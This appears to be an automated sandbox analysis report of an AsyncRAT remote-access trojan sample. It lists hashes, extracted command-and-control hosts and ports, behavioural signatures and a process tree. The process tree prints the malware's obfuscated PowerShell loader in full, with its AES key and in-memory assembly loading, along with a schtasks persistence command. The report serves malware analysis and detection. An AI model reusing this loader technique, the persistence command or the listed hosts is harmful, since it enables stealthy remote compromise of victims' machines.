Analysis
- max time kernel: 61s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 01-02-2023 20:06
Behavioral task: behavioral1
Sample: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
Resource: win7-20221111-en
General
- Target: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
- Size: 72KB
- MD5: 8cb1d168cf75e754026203935dcfa023
- SHA1: ba18d6636f1c59a72fa8042cff7c1e8fdf69eecb
- SHA256: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126
- SHA512: 7254e3bc08701fb233d1b0c340fd6104b9fc4d36ab962f7ac541f0aee539fe3c9a7b3fa692968a977e68690ad183e77d2b5f962b1265983b4771773ff55c62ae
- SSDEEP: 1536:/rGBmYaZyxKeBy3bCXS4ZeUSlACnztfx:/rGBmYaZyxZBy3bCHelAI9x
Malware Config
Extracted
asyncrat
0.5.7B
Default
churchmon.ddns.net:6606
churchmon.ddns.net:7707
churchmon.ddns.net:8808
churchmon21.ddns.net:6606
churchmon21.ddns.net:7707
churchmon21.ddns.net:8808
churchmon22.ddns.net:6606
churchmon22.ddns.net:7707
churchmon22.ddns.net:8808
AsyncMutex_6SI8OkPnk
- delay: 3
- install: false
- install_folder: %AppData%
Signatures
- Async RAT payload (1 IoCs)
  Processes:
    resource: behavioral2/memory/4644-132-0x0000000000740000-0x0000000000752000-memory.dmp  yara_rule: asyncrat
- Executes dropped EXE (1 IoCs)
  Processes:
    pid 3344  process eesdbo.bat.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description: Key value queried  ioc: \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation  process: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow 43  ioc api.ipify.org
    flow 44  ioc api.ipify.org
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Delays execution with timeout.exe (1 IoCs)
  Processes:
    pid 3372  process timeout.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid 3964  process powershell.exe
    pid 3964  process powershell.exe
    pid 3344  process eesdbo.bat.exe
    pid 3344  process eesdbo.bat.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description: Token: SeDebugPrivilege  pid 4644  process 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
    description: Token: SeDebugPrivilege  pid 3964  process powershell.exe
    description: Token: SeDebugPrivilege  pid 3344  process eesdbo.bat.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
    pid 3344  process eesdbo.bat.exe
    pid 3344  process eesdbo.bat.exe
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes:
    pid 3344  process eesdbo.bat.exe
    pid 3344  process eesdbo.bat.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  Processes:
    pid 3344  process eesdbo.bat.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes:
    description: PID 4644 wrote to memory of 240  pid 4644  process 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe  target process cmd.exe
    description: PID 4644 wrote to memory of 240  pid 4644  process 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe  target process cmd.exe
    description: PID 4644 wrote to memory of 240  pid 4644  process 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe  target process cmd.exe
    description: PID 4644 wrote to memory of 2256  pid 4644  process 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe  target process cmd.exe
    description: PID 4644 wrote to memory of 2256  pid 4644  process 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe  target process cmd.exe
    description: PID 4644 wrote to memory of 2256  pid 4644  process 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe  target process cmd.exe
    description: PID 240 wrote to memory of 3964  pid 240  process cmd.exe  target process powershell.exe
    description: PID 240 wrote to memory of 3964  pid 240  process cmd.exe  target process powershell.exe
    description: PID 240 wrote to memory of 3964  pid 240  process cmd.exe  target process powershell.exe
    description: PID 2256 wrote to memory of 3372  pid 2256  process cmd.exe  target process timeout.exe
    description: PID 2256 wrote to memory of 3372  pid 2256  process cmd.exe  target process timeout.exe
    description: PID 2256 wrote to memory of 3372  pid 2256  process cmd.exe  target process timeout.exe
    description: PID 3964 wrote to memory of 3800  pid 3964  process powershell.exe  target process cmd.exe
    description: PID 3964 wrote to memory of 3800  pid 3964  process powershell.exe  target process cmd.exe
    description: PID 3964 wrote to memory of 3800  pid 3964  process powershell.exe  target process cmd.exe
    description: PID 3800 wrote to memory of 3344  pid 3800  process cmd.exe  target process eesdbo.bat.exe
    description: PID 3800 wrote to memory of 3344  pid 3800  process cmd.exe  target process eesdbo.bat.exe
    description: PID 3800 wrote to memory of 3344  pid 3800  process cmd.exe  target process eesdbo.bat.exe
    description: PID 3344 wrote to memory of 3560  pid 3344  process eesdbo.bat.exe  target process schtasks.exe
    description: PID 3344 wrote to memory of 3560  pid 3344  process eesdbo.bat.exe  target process schtasks.exe
    description: PID 3344 wrote to memory of 3560  pid 3344  process eesdbo.bat.exe  target process schtasks.exe
Processes
(process tree, indented by depth; each entry gives the image path, then the captured command line, then the signatures triggered by that process)

C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eesdbo.bat"' & exit
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eesdbo.bat"'
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eesdbo.bat" "
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe
          Command line: "eesdbo.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\eesdbo.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\schtasks.exe
            Command line: "schtasks" /create /tn "Window" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe" /rl HIGHEST /f
            - Creates scheduled task(s)

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCB44.tmp.bat""
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\timeout.exe
      Command line: timeout 2
      - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 15KB
  MD5: f5e94e7c77b98659fe7121ef0226b148
  SHA1: 475f8cfc212b46db59b79b2bb08315eebe3ee05e
  SHA256: aaf5b408a2db7b3b7996970d30f0eecdfd0546c5de629ada6d89b4016bd1edc4
  SHA512: 1407306f685c0ade37404097e423a96a9ff695d051a4d3c0175fb6d92c89bc5223245c03c899e71dd8f74fb857624b569ccc95a76363b6c2c9164675cfb580c5
- C:\Users\Admin\AppData\Local\Temp\eesdbo.bat
  Filesize: 325KB
  MD5: 36438d908fc48e243fc04035eba3a6cd
  SHA1: a552a88e74440a1137b3a3a14e4089a630dfb855
  SHA256: 80504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a
  SHA512: 3cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611
- C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe
  Filesize: 423KB
  MD5: c32ca4acfcc635ec1ea6ed8a34df5fac
  SHA1: f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
  SHA256: 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
  SHA512: 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
- C:\Users\Admin\AppData\Local\Temp\tmpCB44.tmp.bat
  Filesize: 216B
  MD5: 0b02e6984b6c86cd90d891b95b015f50
  SHA1: e3d63bea04ffdbd051c051dfdd0b4824fefcea65
  SHA256: ab7f66d5c61be41a157a61d4c96eb6ac223a87ab66aa3ef0479450c763911b88
  SHA512: ab62cb71ee59aba5f48f03452d224408ee8932fec023277cccc9c833c6c49ac5c3798612e496b273850078af3401a6dcfe6f025a816ab1e29cdc3b846c4ac741
- memory/240-138-0x0000000000000000-mapping.dmp
- memory/2256-139-0x0000000000000000-mapping.dmp
- memory/3344-161-0x00000000076D0000-0x0000000007720000-memory.dmp  Filesize: 320KB
- memory/3344-159-0x0000000007580000-0x000000000758A000-memory.dmp  Filesize: 40KB
- memory/3344-158-0x00000000073F0000-0x0000000007482000-memory.dmp  Filesize: 584KB
- memory/3344-162-0x0000000007EF0000-0x0000000007FA2000-memory.dmp  Filesize: 712KB
- memory/3344-156-0x0000000007870000-0x0000000007EEA000-memory.dmp  Filesize: 6.5MB
- memory/3344-163-0x0000000008180000-0x0000000008342000-memory.dmp  Filesize: 1.8MB
- memory/3344-153-0x0000000000000000-mapping.dmp
- memory/3344-164-0x0000000009070000-0x0000000009688000-memory.dmp  Filesize: 6.1MB
- memory/3372-142-0x0000000000000000-mapping.dmp
- memory/3560-160-0x0000000000000000-mapping.dmp
- memory/3800-152-0x0000000000000000-mapping.dmp
- memory/3964-140-0x0000000000000000-mapping.dmp
- memory/3964-150-0x0000000005FA0000-0x0000000005FC2000-memory.dmp  Filesize: 136KB
- memory/3964-149-0x0000000005F50000-0x0000000005F6A000-memory.dmp  Filesize: 104KB
- memory/3964-148-0x0000000005FF0000-0x0000000006086000-memory.dmp  Filesize: 600KB
- memory/3964-147-0x0000000005A60000-0x0000000005A7E000-memory.dmp  Filesize: 120KB
- memory/3964-146-0x0000000005390000-0x00000000053F6000-memory.dmp  Filesize: 408KB
- memory/3964-145-0x00000000052C0000-0x00000000052E2000-memory.dmp  Filesize: 136KB
- memory/3964-144-0x0000000004B20000-0x0000000005148000-memory.dmp  Filesize: 6.2MB
- memory/3964-143-0x00000000044B0000-0x00000000044E6000-memory.dmp  Filesize: 216KB
- memory/4644-132-0x0000000000740000-0x0000000000752000-memory.dmp  Filesize: 72KB
- memory/4644-137-0x00000000069E0000-0x00000000069FE000-memory.dmp  Filesize: 120KB
- memory/4644-136-0x0000000006A40000-0x0000000006AB6000-memory.dmp  Filesize: 472KB
- memory/4644-135-0x0000000005590000-0x00000000055F6000-memory.dmp  Filesize: 408KB
- memory/4644-134-0x0000000005AD0000-0x0000000006074000-memory.dmp  Filesize: 5.6MB
- memory/4644-133-0x0000000005480000-0x000000000551C000-memory.dmp  Filesize: 624KB